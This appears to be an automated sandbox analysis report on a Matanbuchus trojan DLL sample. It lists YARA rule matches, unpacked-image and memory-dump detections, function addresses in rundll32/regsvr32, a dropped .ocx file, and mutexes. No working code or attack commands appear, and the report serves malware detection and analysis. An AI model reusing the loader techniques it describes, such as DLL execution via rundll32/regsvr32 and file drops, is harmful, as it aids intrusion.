Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_6CF20D90 13_2_6CF20D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_6CF5EED0 13_2_6CF5EED0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_6CF615B0 13_2_6CF615B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_6CF4B280 13_2_6CF4B280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF1D60 13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE76F0 13_2_7EDE76F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDED200 13_2_7EDED200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDBF220 13_2_7EDBF220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB90BD 13_2_7EDB90BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFE179 13_2_7EDFE179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFBFC0 13_2_7EDFBFC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE3FA0 13_2_7EDE3FA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE0FD8B 13_2_7EE0FD8B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE1EAAE 13_2_7EE1EAAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE13A7D 13_2_7EE13A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE0FA26 13_2_7EE0FA26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDDEA20 13_2_7EDDEA20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE76F0 13_2_7EDE76F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE58DA 13_2_7EDE58DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE0895D 13_2_7EE0895D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE0A900 13_2_7EE0A900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDDD6D0 13_2_7EDDD6D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE0F698 13_2_7EE0F698
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFA7DC 13_2_7EDFA7DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDDF744 13_2_7EDDF744
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF84C0 13_2_7EDF84C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE0490 13_2_7EDE0490
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFB44F 13_2_7EDFB44F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDD558D 13_2_7EDD558D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE1736C 13_2_7EE1736C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE04350 13_2_7EE04350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB7310 13_2_7EDB7310
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE60E0 13_2_7EDE60E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFB005 13_2_7EDFB005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE3180 13_2_7EDE3180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDFA1B9 13_2_7EDFA1B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7D9F70 18_2_7F7D9F70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B0FF0 18_2_7F7B0FF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7DBFC0 18_2_7F7DBFC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C3FA0 18_2_7F7C3FA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7B6D40 18_2_7F7B6D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C4D00 18_2_7F7C4D00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C76F0 18_2_7F7C76F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7BD6D0 18_2_7F7BD6D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7AF690 18_2_7F7AF690
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7E4350 18_2_7F7E4350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F797310 18_2_7F797310
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7CD200 18_2_7F7CD200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C3180 18_2_7F7C3180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7C60E0 18_2_7F7C60E0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_6B5115B0 36_2_6B5115B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F103FA0 36_2_7F103FA0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F11BFC0 36_2_7F11BFC0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F0FF0 36_2_7F0F0FF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0EF690 36_2_7F0EF690
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F1076F0 36_2_7F1076F0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0F6D40 36_2_7F0F6D40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F0D7310 36_2_7F0D7310
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F124350 36_2_7F124350
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F10D200 36_2_7F10D200
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F103180 36_2_7F103180
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F1060E0 36_2_7F1060E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 7F7F17CD appears 126 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 7F7E3810 appears 31 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 7EE117CD appears 150 times
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 7F1317CD appears 132 times
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612
Source: useraccount.aspx.dll Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: useraccount.aspx.dll, type: SAMPLE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: sslproxydump.pcap, type: PCAP Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: classification engine Classification label: mal100.troj.evad.winDLL@52/7@3/2
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\8f08
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\8f08
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7584
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f03c22d8-5435-4c04-83ee-cce6b2ae6093
